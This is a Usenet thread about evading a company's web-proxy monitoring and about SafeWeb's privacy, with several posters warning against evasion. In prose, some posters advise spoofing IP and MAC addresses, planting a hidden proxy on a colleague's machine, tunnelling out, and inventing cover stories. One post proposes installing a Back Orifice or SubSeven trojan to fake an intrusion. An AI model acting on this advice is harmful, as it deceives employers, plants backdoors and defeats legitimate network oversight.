Hiding our IP
Julien P.
system administrator can see what sites we are surfing. Is it possible, and
how, to hide, or even better to change, our IP address to our proxy, so the
system administrator will have a fake IP and so cannot know who is surfing
those sites ?
Thanks
Kane Swift
www.safeweb.com
It also encrypts the traffic with SSL so even if they tap the line they
won't know where you're going or what you're viewing.
Julien P. <jp...@mis.mc> wrote in message
news:9882016...@toffoli.webstore.fr...
Julien P.
even know I am on the web. That is why I want to hide or change my IP for
the proxy...
"Kane Swift" <nob...@nodomain.com> a écrit dans le message news:
9c6gd9$1lun$1...@buty.wanadoo.nl...
Ahab
It sounds like you want to combine port forwarding with secure
tunnelling to an external proxy. Unfortunately, chances are that your
companies firewall will block this, depends on how tight your sys
admin keeps the screws.
Port forwarding will stop your sys admin from being able to tell what
you're doing from the ports you use, and the SSL part of the equation
will encrypt the packets so he can't use a packet sniffer, and the
proxy will make sure he cant see where the packets are going.
- --
Regards,
Ahab
ahab<at>nym<dot>alias<dot>net
#Ahab on DALnet
And on the third day, God said:
"Let there be div(D)=Pf, div(B)=0, curl(E)=-dB/dt, curl(H)=jf+dD/dt"
"Julien P." <jp...@mis.mc> wrote in message
news:9882034...@toffoli.webstore.fr...
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
iQEVAwUBOubTM/QGip6C6USdAQH9jAf8CWOmObThREdt1mplUcL1Eo44MLcvpGbt
O80BAU9iKveSz2dQOq4fpl6o+yyKQy+FDlyUApLbo4ts2MWhS93BrKBEAyJbS0x2
EulLX0UoKxgH3A90Zgmh9vqBgkS3xpj1RCJ51I/U74lZZN3Y3pllD6g5yHGm3E2h
SkRL1clYRaXM44ycrDbiPZG8dUNFj2mHG10QUp20iOaV9wpNaN9rMojOfCoCItaT
2hpcZ2s2vlbyFbeN0y5IPj3yU8YKtEB/YAev4OtNbmE0f3zkQFWgMnFT72UCVFUM
il9NMsFjJBGWfqxj+Q3b9FICYNMXC8jc1AeRNn0kqszEV/rfWeybkw==
=KGKj
-----END PGP SIGNATURE-----
Julien P.
will believe the one that is surfing one web site us 191.168.0.160 for
example and in real my real IP adress is not this one.
But I don't know if it is possible...
"Ahab" <see...@sig.block> a écrit dans le message news:
muAF6.103829$n56.2...@news.easynews.com...
nemo outis
do the trick for you. You use "httport" to tunnel out to an outside proxy
server. (Look 'em up.) But if you want to get fancy you can roll your own and
set up, say, your home computer as the proxy server you tunnel out to by
installing htthost. (There are cracks for httport to get the encryption
features, etc. or I suppose you could even pay for it.)
Take a look at:
There are also "socks" ways of doing this with socks2http. I haven't looked
into whether there is any secure https version tunnelling software around
somewhere - you might come across something in your searches.
Regards,
In article <98820687...@toffoli.webstore.fr>, "Julien P." <jp...@mis.mc>
wrote:
Ahab
Why not try the Freedom client, its free. It will filter out most
ads, and has a cookie manager and other stuff.
- --
Regards,
Ahab
ahab<at>nym<dot>alias<dot>net
#Ahab on DALnet
And on the third day, God said:
"Let there be div(D)=Pf, div(B)=0, curl(E)=-dB/dt, curl(H)=jf+dD/dt"
> Gillhaney says:
> > Anonymizer's are though, aren't they?
>
> Yeah, but it's run by greedy scroogeian assholes who purposedly
> slow you down and clutter your browser with a lot more ads. If you
> don't want to see graphics, I suggest cotse.com
>
> http://www.cotse.com/anonimizer.htm
>
> Yes, they spell it that way. It's fast and removes ads. I rarely
> surf with images turned on these days anyway. Most sites have too
> many ads and bandwidth is just too important to waste on those
> parasites. I also refuse to enable cookies and java/script.
>
> Alternatively, I would suggest the proxy at http://anon.xg.nu , but
> they'll be history in two weeks. I'm willing to be that no one
> donated anything. They're services are easy to use, but not very
> efficient.
>
> --
> Shale
>
> "Did you ever look up the word 'mercenary'? It's
> someone who 'works merely for money.' It's not
the money that bothers me, it's the 'merely'."
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
iQEVAwUBOubt+/QGip6C6USdAQFB9wgAp0bHxgHHZyYRGXLG2usNU7Fqym/y3DMa
fR8SBQkyIt5g5XA5A6oIhzykk6eROPZKzjkx5DmDMsh1v9mUIIPMqpUUD7lUR2CM
T+/fTohJFmYnGxqhnysXb7YsxEnxPsKneOjY0NTVQoTaHBGhA3m1oWaJG7nQyifX
lQ87wZnPcZ6u0xFNzYXFrLytpfDgAK6+QCg34uCc1pfGCWBaHIitAHAd5xWeRFhH
lgfirPRe2uQ5rzU8y3CEnUq03dHiiRmfLjuyoZgTOkvWxI1k0Jk/zxMNopl/1EAn
FKNcFQCroZnbiSTJjFOyMa37+2lJVCgmR3/tpsNbqksJQ00iMwvSEQ==
=zfTs
-----END PGP SIGNATURE-----
Juergen Nieveler
Can't be done.
And if the administrator and your company don't want you to surf to certain
sites, than you'd better not try to outsmart them... otherwise you'll see
how fast they can detect it and fire you.
--
Juergen Nieveler
Support the ban of Dihydrogen Monoxide: http://www.dhmo.org/
"The people united can never be ignited!"- Sgt. Colon, Ankh-Morpork Watch
www.bofh.mynetcologne.de / bo...@netcologne.de / PGP Supported!
Dave Howe
juergen....@web.de (Juergen Nieveler) said :
>Can't be done.
can be, but is risky.
>And if the administrator and your company don't want you to surf to certain
>sites, than you'd better not try to outsmart them... otherwise you'll see
>how fast they can detect it and fire you.
yup, this is more to the point.
methods
1. change your IP address to something else. while you are at it,
change your MAC address to something else too (most network cards
support this, but you will have to research how it is done yourself)
consider your MAC address to be like an ip address that is "lower" and
closer to the wire than IP - routers learn to associate an IP address
with a MAC address for purposes of routing, so it is possible to
backtrack a machine via this too.
2. find a machine that is permitted to surf (such as a webserver or a
upper management machine *grin*) and install a proxy server on it.
disable any logs on the proxy, and bounce your packets off that rather
than off the official proxy.
downside is as above - if you get caught websurfing, you will get a
telling off. if you get caught deliberately buggering about with your
IP, MAC or someone elses machine, you will be looking for a new job.
Don't try it on *my* network as I *will* notice, and retribution will
be swift (once I track you down) :)
<alt.security.pgp snipped - can't see why it was crossposted there
anyhow.>
--== DaveHowe ( is at) Bigfoot dot com ==--
Paul Rubin
> But my goal will be to even hide that I am surfing on the web, so they dont
> even know I am on the web. That is why I want to hide or change my IP for
> the proxy...
Get yourself a WAP phone and surf on your own nickel :).
Paul Rubin
> >http://www.cotse.com/anonimizer.htm
>
> That's my favourite, especially for visiting those risky sites where you
> don't know what's gonna be running in the background.
My favorite is now safeweb, since it uses SSL on the local side.
I wish Cotse would do the same.
Thomas Shaddack
<Xns908EC8057E4E...@nieveler-43544.user.cis.dfn.de>:
>>In my company we have to go through a proxy to access internet. So the
>>system administrator can see what sites we are surfing. Is it possible,
>>and how, to hide, or even better to change, our IP address to our
>>proxy, so the system administrator will have a fake IP and so cannot
>>know who is surfing those sites ?
>
>Can't be done.
>
>And if the administrator and your company don't want you to surf to
>certain sites, than you'd better not try to outsmart them... otherwise
>you'll see how fast they can detect it and fire you.
Can you make an SSH (or telnet) connection out?
Do you want text and can sacrifice the pictures?
If you answer both yes, the solution is simple.
A unixoid (Linux, *BSD, AIX, BeOS, whatever) account "outside". Connect
there, run Lynx, browse the Net.
Or study your firewall. You could open a persistent connection through port
80, opening HTTP tunnel to another machine. Will require some programming
on both sides. Alternatively, you could tunnel through any other protocol;
I heard about full TCP/IP tunnelling through AIM messaging.
Don't try to outsmart a smart sysadmin; but, as far as I seen/heard, they
are rare. Don't be too bold, don't hog the bandwidth; keep low profile,
don't do anything that would attract attention when browsing the logs.
Shaddack, the Mad Scientist
Thomas Shaddack
<p1peet8h1u3lbs8e2...@4ax.com>:
> Yeah, but still, if your IS dept. is watching, they may
>question why you are using an anonymizing service. That's a sure sign
>that you're probably doing something that is not company business.
You could claim you don't want to make the company associatede with your
online activities, in order to prevent their eventual liability?
In case you get questioned, prepare a cover story that would in believable
way claim you are protecting the company's interests. Could work :)
Juergen Nieveler
>Or study your firewall. You could open a persistent connection through
>port 80, opening HTTP tunnel to another machine. Will require some
>programming on both sides. Alternatively, you could tunnel through any
>other protocol; I heard about full TCP/IP tunnelling through AIM
>messaging.
Uh... I'd suggest to first study your contract. Otherwise you might be in
for a NASTY surprise, namely two people escorting you out after cleaning
out your desk.
>Don't try to outsmart a smart sysadmin; but, as far as I seen/heard,
>they are rare. Don't be too bold, don't hog the bandwidth; keep low
>profile, don't do anything that would attract attention when browsing
>the logs.
Or just DON'T DO IT.
Do not underestimate your Sysadmin... he might seem dumb, he might seem to
be a nerd, but he was smart enough to be hired as a Sysadmin.
Juergen Nieveler
>You could claim you don't want to make the company associatede with your
>online activities, in order to prevent their eventual liability?
In which case they would ask "What did you do that _could_ make us liable?"
and "What does it have to do with your job here and why did you have to do
it during your work time?"
Thomas Shaddack
>>Or study your firewall. You could open a persistent connection through
>>port 80, opening HTTP tunnel to another machine. Will require some
>>programming on both sides. Alternatively, you could tunnel through any
>>other protocol; I heard about full TCP/IP tunnelling through AIM
>>messaging.
>
>Uh... I'd suggest to first study your contract. Otherwise you might be
>in for a NASTY surprise, namely two people escorting you out after
>cleaning out your desk.
You have to be caught first.
Then, depending on your bosses, you could happen to become the new
sysadmin. On many local schools the students that hack the school networks
are put on charge of it. (IMHO, clever solution how to get cheap, qualified
admins there.) Anyway, you have to count with being caught; but if you
aren't careless and have a dumb admin, you have good chance. If you get
caught, the results will depend on the people you will have to deal with.
Risk also depends on your abilities to eventually find a new job; hightech
skills, largely necessary to fool the networks, help here as well.
>>Don't try to outsmart a smart sysadmin; but, as far as I seen/heard,
>>they are rare. Don't be too bold, don't hog the bandwidth; keep low
>>profile, don't do anything that would attract attention when browsing
>>the logs.
>
>Or just DON'T DO IT.
>
>Do not underestimate your Sysadmin... he might seem dumb, he might seem
>to be a nerd, but he was smart enough to be hired as a Sysadmin.
If he seems to be a nerd, it's probable he will know his network; never
judge technician's skills from how he looks, it often corresponds inversely
(true aces tend to be asocial/antisocial types). However, the fact one is
hired as a sysadmin by far doesn't have to mean he is smart enough; it
means only that the *management* thought he is smart enough. Often they are
just MCSE-having drones; it isn't coincidence MCSE is rumoured to mean Must
Call Someone Experienced. I seen some sad cases, and my friends techies
told me more similar stories...
Your sysadmin may be a drone, relying on easy-to-fool scanning tools. Or he
may be a knows-it-all ace that will spot you from a single glance to the
logfiles. You have to know your adversary.
Shaddack, the Mad Scientist
Thomas Shaddack
>NOSPAMs...@type2.com (Thomas Shaddack) wrote:
>
>>You could claim you don't want to make the company associatede with
>>your online activities, in order to prevent their eventual liability?
>
>In which case they would ask "What did you do that _could_ make us
>liable?" and "What does it have to do with your job here and why did you
>have to do it during your work time?"
If you will do it right, the chance you will get caught is small.
You don't necessarily need even to install any special software on your
machine; depending on your needs, maybe you could establish a 'tunnel' out
via a java applet, downloadable and installable via a webpage.
Also, by infecting your own machine by a trojan, ie. Back Orifice or
Subseven, you can achieve certain degree of deniability, as long as you
will not be caught red-handed. (Be careful here to not put the company
security into jeopardy; keep the backdoor passworded. You don't want to
attract an intruder; you want to make an appearance there was one. You must
make completely believable image of outside intrusion. Against, depends on
how careful the sysadmin is, if he scans the network for backdoors - then
avoid this. Most sysadmins' security consciousness is quite lax, though.)
To clarify more and to balance the risks/benefits/costs, I'd need to know
more accurately what do you need/want to accomplish; if it's watching
football results, access to a webmail, or 'tunneling out' sensitive
informations.
Concrete approach depends mainly on what exactly do you want to do.
Sometimes a simple PHP script accessed via HTTPS will do its job; sometimes
you need to telnet out; sometimes you need full-scale TCP/IP tunneling.
A question for the Public: Is there a java applet that can serve as SSH
client? A webpage that would contain a console screen? A lot of el-neato
toys could be written in Java, then run as an applet from a webpage.
Shaddack, the Mad Scientist
Julien P.
sites...
"Thomas Shaddack" <NOSPAMs...@type2.com> a écrit dans le message news:
Xns908FA4BD3804...@195.250.128.40...
anonymous
that entity which used to be deja news in order to see what you are posting
here ?
What then.........
"Julien P." <jp...@mis.mc> wrote in message
news:9882034...@toffoli.webstore.fr...
David Ness
>
> I have to wonder about all this. Has anyone done a study concerning what
> nonproductive resources employers put into spying on the surfing time and
> proclivities of their employees? Should not the bottom line be employee
> productivity? Period!
>
A pretty naive view of business. These days employers are very often in rather
sever legal jeopardy for the actions of their employees. If employers do not
exercise judicious attention' to their employees activities they may end up
in real trouble. Imagine an employee running a gambling or prostitution ring on
a corporate machine as an extreme example.
Johan Wevers
> A question for the Public: Is there a java applet that can serve as SSH
> client? A webpage that would contain a console screen? A lot of el-neato
> toys could be written in Java, then run as an applet from a webpage.
Webmin (www.webmin.com) contains a hhps server and a Java telnet applet.
However, this requires root access to a Unix machine on the net. But
perhaps it can be rewritten for this purpose?
--
ir. J.C.A. Wevers // Physics and science fiction site:
joh...@iae.nl // http://www.xs4all.nl/~johanw/index.html
PGP/GPG public keys at http://www.xs4all.nl/~johanw/pgpkeys.html
Johan Wevers
> Unfortunately the ads clutter the interface.
> And the URLs are not encrypted at all.
Too bad.
Johan Wevers
> But my goal will be to even hide that I am surfing on the web, so they dont
> even know I am on the web. That is why I want to hide or change my IP for
> the proxy...
Install a proxyserver on another computer in the company and surf through
that proxy. It will then apear as if the other computer is surfing.
However, it opens the risk of that other computer being thoroughly examined.
So make sure this proxy is not backtracable to you (so, for example, only
allowing access from your own machine is a bad idea).
Johan Wevers
> No, it's not an extreme example. Employees have been misusing their employers'
> assets for their own ends since time immemorial. In doing so, they are not
> doing the job for which they were hired and should be fired.
Don't overreact, it is sometimes considered as part of the reward for the
job. And for some jobs here there is such a shortage on personel that some
employers silently allow such things to happen. If they fire him, noone will
do the job.
Paul Rubin
> > A question for the Public: Is there a java applet that can serve as SSH
> > client? A webpage that would contain a console screen? A lot of el-neato
> > toys could be written in Java, then run as an applet from a webpage.
>
> Webmin (www.webmin.com) contains a hhps server and a Java telnet applet.
> However, this requires root access to a Unix machine on the net. But
> perhaps it can be rewritten for this purpose?
www.mindbright.com has a java ssh applet called Mindterm. It's handy.
It does require opening a connection from the browser to the remote
computer's ssh port, which some firewalls interfere with. I've figured
out ways around this problem but not gotten around to implementing them.
Paul Rubin
> But my goal will be to even hide that I am surfing on the web, so they dont
> even know I am on the web. That is why I want to hide or change my IP for
> the proxy...
Totally ignoring the issue of what you're up to, you're asking
something like "I want to make outgoing phone calls through the
company phone system without the company knowing I'm making them".
Sorry. Aside from location-specific answers like "hack the company
PBX", there's no way to do that. The closest you can come is bring
your own cellular phone to work and make your calls from that.
Paul Rubin
> > No, it's not an extreme example. Employees have been misusing
> > their employers' assets for their own ends since time
> > immemorial. In doing so, they are not doing the job for which they
> > were hired and should be fired.
>
> Don't overreact, it is sometimes considered as part of the reward for the
> job. And for some jobs here there is such a shortage on personel that some
> employers silently allow such things to happen. If they fire him, noone will
> do the job.
It's considered normal and acceptable where I work, to make a personal
phone call from work every once in a while. But normally one doesn't
try to bypass the phone accounting system to disguise the call's
existence. That would be considered abnormal and suspicious, not
normal and acceptable.
Thomas J. Boschloo
>
> Shale wrote:
>
> > Unfortunately the ads clutter the interface.
>
> www.junkbusters.com
Even better, combined with <http://www.webwasher.com> and
<http://proxomitron.cjb.net> you have killer ad-killer capabilities. I
wouldn't even use junkbusters anymore when using those two programs.
Combined they do the same thing and they do it much easier.
Proxomitron kills the animated gif banners and blocks the referers and
user-agent headers. Webwasher blocks the ad-providers and automatically
spots ads by their size and dimensions (if you set it to).
Thomas
--
"The only way out is through" - Trent Reznor
Thomas J. Boschloo
>
> On Wed, 25 Apr 2001, Shale <bere...@the.substitute> wrote:
> >Unfortunately the ads clutter the interface. And the URLs are not
> >encrypted at all.
> >
> The ads are trivial; if they help keep the service free, I'm glad to
> put up with them. So far, the service has been very quick; I hope they
> can keep pace.
>
> I don't understand your remark about the URLs; could you elaborate?
Something like
<http://anonymous-server.com/?www.doihaveaids.org/ihopemyemployerdoesntfindout>
can be very revealing.
There is also the thing about ads that Stephen Gielda has said in the
past, the ad providers want unique ip-addresses, your address. And a
referer header (that most people don't know about) can also be very
revealing.
Thomas J. Boschloo
> A question for the Public: Is there a java applet that can serve as SSH
> client? A webpage that would contain a console screen? A lot of el-neato
> toys could be written in Java, then run as an applet from a webpage.
I have never really tried it myself, so I don't know how it works, but
do you know of Java Anonymous Proxy (JAP)?
<http://anon.inf.tu-dresden.de>. I know it comes from a good stock ;-> I
mean, <http://www.inf.tu-dresden.de/~hf2/anon/> is there and they seem
to do some anonimity research at that technical university (tu) in
Germany.
Dave Howe
+0200]), "Thomas J. Boschloo" <nos...@multiweb.nl> said :
><http://anonymous-server.com/?www.doihaveaids.org/ihopemyemployerdoesntfindout>
>can be very revealing.
the words GET or POST)
however, if it is HTTP you do not get to see the url - what you get in
the logs looks like this:
CONNECT www.safeweb.com:443 HTTP/1.0
so they get to see you went to safeweb, but not what you did there
>There is also the thing about ads that Stephen Gielda has said in the
>past, the ad providers want unique ip-addresses, your address. And a
>referer header (that most people don't know about) can also be very
>revealing.
Safeweb blocks both.
Juergen Nieveler
<s7rretklo5l4r6lnf...@4ax.com>:
>><http://anonymous-server.com/?www.doihaveaids.org/ihopemyemployerdoesntf
>><indout>
>>can be very revealing.
>and indeed, would show up in proxy logs as such (usually preceeded by
>the words GET or POST)
>however, if it is HTTP you do not get to see the url - what you get in
>the logs looks like this:
>CONNECT www.safeweb.com:443 HTTP/1.0
>so they get to see you went to safeweb, but not what you did there
Nope... sorry to correct you.
A properly configured proxy (a Squid with standard config will do) will
show you the complete URL, including which picture was loaded.
Squid-Logs do make a funny reading... especially if you grep them for
certain keywords :-)
Nomen Nescio
wrote:
To use Safeweb Java & Java Scripts must be ON ?
Jeremy Bishop
>
> Dave Howe <Spam.B...@bigfoot.com> wrote in
> <s7rretklo5l4r6lnf...@4ax.com>:
[small snip]
> >however, if it is HTTP you do not get to see the url - what you get in
> >the logs looks like this:
> >CONNECT www.safeweb.com:443 HTTP/1.0
> >so they get to see you went to safeweb, but not what you did there
>
> Nope... sorry to correct you.
>
> A properly configured proxy (a Squid with standard config will do) will
> show you the complete URL, including which picture was loaded.
Might either of you post a clarification? What I am seeing is Dave
talking about HTTPS and spelling it HTTP, and Juergen talking about
HTTP. So, which is it?
--
"A pentagram approaches a circle for
sufficiently large values of five."
-- Jerry, in The Wizardry Cursed by Rick Cook
Juergen Nieveler
<3AEF1595...@org.praetor>:
>Might either of you post a clarification? What I am seeing is Dave
>talking about HTTPS and spelling it HTTP, and Juergen talking about
>HTTP. So, which is it?
Both HTTP and HTTPS will be logged with a complete URL.
Some anonymizers have an option to encrypt the requested URL, though...
maybe that's what he's been thinking of. In this case, you'd see (rough
example...):
http://www.(anonymizer of choice).com/ush73gsskhduee/
instead of
http://www.(anonymizer of choice).com/show=www.sex.com/
Maybe that's what he was thinking of... this is one of the reasons why
anonymizers are among the top of the list when an Admin blocks access to
certain sites.
Paul Rubin
> >CONNECT www.safeweb.com:443 HTTP/1.0
> >so they get to see you went to safeweb, but not what you did there
>
> Nope... sorry to correct you.
>
> A properly configured proxy (a Squid with standard config will do) will
> show you the complete URL, including which picture was loaded.
I don't see how it can do that. Safeweb uses SSL, so the URL path
(the part after the hostname) is encrypted.
Anonymous
How do you use Safeweb ?
Is it safe ?
Any special configurations that have to be on ?
Safeweb primary revenue is from CIA contracts,
how this could make them safe ? When CIA hand
is feeding them, how they anonymizing
service could be trusted ? It is against
logic, doesn't it ?
Jeremy Bishop
>
> Jeremy Bishop <req...@org.praetor> wrote in
> <3AEF1595...@org.praetor>:
>
> >Might either of you post a clarification? What I am seeing is Dave
> >talking about HTTPS and spelling it HTTP, and Juergen talking about
> >HTTP. So, which is it?
>
> Both HTTP and HTTPS will be logged with a complete URL.
>
> Some anonymizers have an option to encrypt the requested URL, though...
> maybe that's what he's been thinking of. In this case, you'd see (rough
> example...):
Yes, I have run across one of those before. Anyway, I couldn't shake
the feeling of wrongness, so I installed squid (default prefs) to give
it a run. Here is a sampling of the logs:
988767403.116 3474 127.0.0.1 TCP_MISS/000 3863 CONNECT
www.praetor.org:443 - DIRECT/www.praetor.org -
(repeated about eight times.)
Every request but the first was to a specific page (e.g.
praetor.org/about.html), but only the hostname was logged, as above.
With ordinary HTTP the complete GET request is shown:
988768024.211 130 127.0.0.1 TCP_MISS/200 4114 GET
http://www.praetor.org/resources.html - DIRECT/www.praetor.org text/html
This would be compatible with the idea that beyond the initial CONNECT,
all other URL information (images, etc) would be handled within the
encrypted channel.
Do I win yet?
--
Intel: where Quality is job number 0.9998782345!
Paul Rubin
> To use Safeweb Java & Java Scripts must be ON ?
Safeweb uses javascript for its own UI, but can filter javascript
out of the incoming remote pages. It doesn't use java, just javascript.
Juergen Nieveler
>Do I win yet?
This seems rather strange... I get the following in my Access.log (Name of
the parent proxy deleted, as it's a company-proxy):
988785395.830 211 10.153.144.145 TCP_REFRESH_HIT/304 386 GET
http://web.icq.com/lib/image/0,,3706,00.gif -
DEFAULT_PARENT/proxy.***.***.de image/gif
Jeremy Bishop
> This seems rather strange... I get the following in my Access.log (Name of
> the parent proxy deleted, as it's a company-proxy):
>
> 988785395.830 211 10.153.144.145 TCP_REFRESH_HIT/304 386 GET
> http://web.icq.com/lib/image/0,,3706,00.gif -
> DEFAULT_PARENT/proxy.***.***.de image/gif
And for an HTTPS connection?
--
Real programmers don't bring brown-bag lunches. If the vending machine
doesn't sell it, they don't eat it. Vending machines don't sell quiche.
Dave Howe
juergen....@web.de (Juergen Nieveler) said :
>Dave Howe <Spam.B...@bigfoot.com> wrote in
><s7rretklo5l4r6lnf...@4ax.com>:
>
>>><http://anonymous-server.com/?www.doihaveaids.org/ihopemyemployerdoesntf
>>><indout>
>>>can be very revealing.
>>and indeed, would show up in proxy logs as such (usually preceeded by
>>the words GET or POST)
>>however, if it is HTTP you do not get to see the url - what you get in
>>the logs looks like this:
>>CONNECT www.safeweb.com:443 HTTP/1.0
>>so they get to see you went to safeweb, but not what you did there
>
>Nope... sorry to correct you.
>A properly configured proxy (a Squid with standard config will do) will
>show you the complete URL, including which picture was loaded.
connects to 443 would be HTTPS, which if Squid can look inside I
*REALLY* need to take a good hard look at squid ;)
Dave Howe
+0200]), Anonymous <nob...@remailer.privacy.at> said :
>How do you use Safeweb ?
>Is it safe ?
within reason, yes.
>Any special configurations that have to be on ?
javascript enabled.
>Safeweb primary revenue is from CIA contracts,
>how this could make them safe ?
CIA "security firm" investment cover invested openly in Safeweb -
AFTER it had proved itself.
>When CIA hand
>is feeding them, how they anonymizing
>service could be trusted ?
If selling something openly to the CIA makes you suspect, I doubt many
firms in America would be clean.
>It is against
>logic, doesn't it ?
Not really. There is no evidence that Safeweb has anything to do with
the CIA beyond selling them a product - but to be honest, are you
planning to do anything VIA safeweb that would be worth the CIA
letting the world know they have a finger in the pie? Governments
have happily let thousands of people die before now to hide the fact
they can eavesdrop on sensitive conversations......
Paul Rubin
> Both HTTP and HTTPS will be logged with a complete URL.
How can that be? In HTTPS, the URL path is sent through the SSL connection.
The proxy can't log it without breaking the encryption.
Paul Rubin
> >Do I win yet?
>
> This seems rather strange... I get the following in my Access.log (Name of
> the parent proxy deleted, as it's a company-proxy):
>
> 988785395.830 211 10.153.144.145 TCP_REFRESH_HIT/304 386 GET
> http://web.icq.com/lib/image/0,,3706,00.gif -
> DEFAULT_PARENT/proxy.***.***.de image/gif
That's an http request, not an https request. If it was https, you
wouldn't see the /lib/image/... part. Here's an https page you can
visit through your proxy:
https://www.nightsong.com:8443/crypto/dice.php
Paul Rubin
> How do you use Safeweb ?
> Is it safe ?
> Any special configurations that have to be on ?
I use safeweb pretty often. It seems pretty safe. If I was doing
something really secret I wouldn't use it, but I'm fine with it for
just avoiding leaving my IP address with possible spammers etc.
A. Melon
wrote..
>Governments have happily let thousands of people die before now
>to hide the fact they can eavesdrop on sensitive conversations..
The CIA contracted Safeweb. Safeweb should be considered monitored.
Safeweb is not secure.. I tested Safeweb with an embedded object and
'the worm bot' clearly showed my original IP#, together with the IP#
of the Safeweb relay.
That's all I have to say about that.
StJohn.
Juergen Nieveler
>How can that be? In HTTPS, the URL path is sent through the SSL
>connection. The proxy can't log it without breaking the encryption.
Sorry, that was an out-of-coffee-error.
You're right, of course... squid cannot cache HTTPS, and therefore won't
put anything in it's log.
*must drink more coffee* :-)
Juergen Nieveler
>no, sorry - it was midnight and I typoed ;)
>connects to 443 would be HTTPS, which if Squid can look inside I
>*REALLY* need to take a good hard look at squid ;)
Ah... that about clears it up :-)
Of course, 443 is proxied transparently, so it won't show up in the cache
log, I guess.
Anonymous
>
> To use Safeweb Java & Java Scripts must be ON ?
If that is the case, I would feel _anything_ but "safe".
Free-man
wrote:
>
>>
>> To use Safeweb Java & Java Scripts must be ON ?
>
>
>If that is the case, I would feel _anything_ but "safe".
According to Safeweb's FAQ, it is not necessary to enable
Java or JavaScript.
But either way, Safeweb does not work with my Opera browser.
I get the error message, "illegal address".
Rich Eramian aka freeman at shore dot net
>
Paul Rubin
> According to Safeweb's FAQ, it is not necessary to enable
> Java or JavaScript.
Javascript yes, Java no.
Free-man
wrote:
Hello Paul -- You seem to know what you are talking about but
I will include the relevant parts of the FAQ anyway. And it still
doesn't work for me. :(
Rich Eramian aka freeman at shore dot net
"... We also strongly recommend turning on Javascript and
cookies in your Web browser preferences as those will
substantially improve your SafeWeb browsing experience."
" How does SafeWeb handle JavaScript?
There have been numerous claims, mainly by privacy
companies, that JavaScript by itself is very dangerous to
your privacy and that pages containing JavaScript should
not be allowed through their privacy servers. These claims
are false. JavaScript is no more "dangerous" than HTML. By
design, JavaScript was limited in its feature set to prevent
any abuse of your computer or privacy. It is harder to make
JavaScript code secure than it is to secure HTML but
certainly not impossible. We analyze all JavaScript code
that passes through our servers and sanitize it so that you
can maintain your normal browsing habits while still
remaining safe from prying eyes. We do the same for
VBScript."
Dave Howe
-0700]), "A. Melon" <ju...@melontraffickers.com> said :
>On Wed, 02 May 2001 22:11, Dave Howe <Spam.B...@bigfoot.com>
>wrote..
>>Governments have happily let thousands of people die before now
>>to hide the fact they can eavesdrop on sensitive conversations..
>The CIA contracted Safeweb. Safeweb should be considered monitored.
be considered monitored.
>Safeweb is not secure.. I tested Safeweb with an embedded object and
>'the worm bot' clearly showed my original IP#, together with the IP#
>of the Safeweb relay.
presumably this is the imbedded object that was the subject of the
"shall I allow this y/n?" dialog box you said Y to?
Anonymous
On Fri, 04 May 2001 23:57, Dave Howe <Spam.B...@bigfoot.com>
wrote..
>"A. Melon" <ju...@melontraffickers.com> said :
>>Dave Howe <Spam.B...@bigfoot.com> wrote..
>>>Governments have happily let thousands of people die before now
>>>to hide the fact they can eavesdrop on sensitive conversations..
>>The CIA contracted Safeweb. Safeweb should be considered monitored.
>Gas stations sell Gas to the CIA for their cars. Gas stations should
>be considered monitored.
Very true, camera's et al.
Dave.. I am capable of reasoning, are you?..
>>Safeweb is not secure.. I tested Safeweb with an embedded object
>>and 'the worm bot' clearly showed my original IP#, together with
>>the IP# of the Safeweb relay.
>presumably this is the imbedded object that was the subject of the
>"shall I allow this y/n?" dialog box you said Y to?
No.. I read that JavaScript *must* be allowed, so I tested Safeweb
against known exploits. Safeweb != Safe..
DrJohn.
Dave Howe
+0200 (CEST)]), Anonymous <m...@mix2.hyperreal.pl> said :
>Dave.. I am capable of reasoning, are you?..
>No.. I read that JavaScript *must* be allowed, so I tested Safeweb
>against known exploits. Safeweb != Safe..
Well, that is easy for you to demonstrate - return to that site, load
up the page, and save it as a Safeweb shortcut - then paste the url
here so we can see it fail for ourselves.
Paul Rubin
> >Javascript yes, Java no.
>
> Hello Paul -- You seem to know what you are talking about but
> I will include the relevant parts of the FAQ anyway. And it still
> doesn't work for me. :(
What exactly did you do and what browser are you using?
> " How does SafeWeb handle JavaScript? ... We
> analyze all JavaScript code that passes through our servers and
> sanitize it so that you can maintain your normal browsing habits
> while still remaining safe from prying eyes.
I don't believe it's possible for Safeweb to completely sanitize
javascript and also ensure that all pages view normally (think of the
"eval" function). Safeweb does a reasonable job on the usual
javascript constructions though. And it offers a setting to
completely disable incoming javascript, which is what I'd recommend if
you think the remote page might contain javascript designed to
circumvent safeweb.
Mr. Anonymous
On Sat, 05 May 2001 21:15, Dave Howe <Spam.B...@bigfoot.com>
wrote..
>Anonymous <m...@mix2.hyperreal.pl> said :
>>Dave Howe <Spam.B...@bigfoot.com> wrote..
>>Very true, camera's et al.
>>Dave.. I am capable of reasoning, are you?..
>Probably ;)
<g>Let's find out..
>>No.. I read that JavaScript *must* be allowed, so I tested Safeweb
>>against known exploits. Safeweb != Safe..
>Well, that is easy for you to demonstrate - return to that site,
>load up the page, and save it as a Safeweb shortcut - then paste the
>url
>here so we can see it fail for ourselves.
Nope. That would compromise my anonymity.
Suggest something else.
DrJohn.
--
This message was posted via one or more anonymous remailing services.
The original sender is unknown. Any address shown in the From header
is unverified.
Paul Rubin
> Well, that is easy for you to demonstrate - return to that site, load
> up the page, and save it as a Safeweb shortcut - then paste the url
> here so we can see it fail for ourselves.
Try visiting http://www.nightsong.com/phr/safeweb-insecure.html. That
page contains some javascript to pop a window on www.yahoo.com, where
the javascript is cooked to bypass Safeweb's anonymization, so your IP
address will appear in Yahoo's logs.
Of course I could have made the javascript generate an image tag
to a 1x1 pixel invisible gif on my site, instead of to Yahoo.
That means I'd have gotten your IP instead of Yahoo, and no window
would have popped.
Safeweb does anonymize normal, straightforwardly written Javascript,
but someone writing javascript specifically to beat Safeweb
anonymization can get your address. I haven't noticed any sites doing
that, and I find Safeweb useful for providing low-grade privacy
despite its having some security holes. I would never think of it as
being in the same league as ZKS Freedom or anything like that.
Thomas Shaddack
<7xn18rt...@ruckus.brouhaha.com>:
>Of course I could have made the javascript generate an image tag
>to a 1x1 pixel invisible gif on my site, instead of to Yahoo.
>That means I'd have gotten your IP instead of Yahoo, and no window
>would have popped.
Combine it with access-blocking proxy, configure the proxy with a
"whitelist" (forbid access to machines other than the listed ones), and put
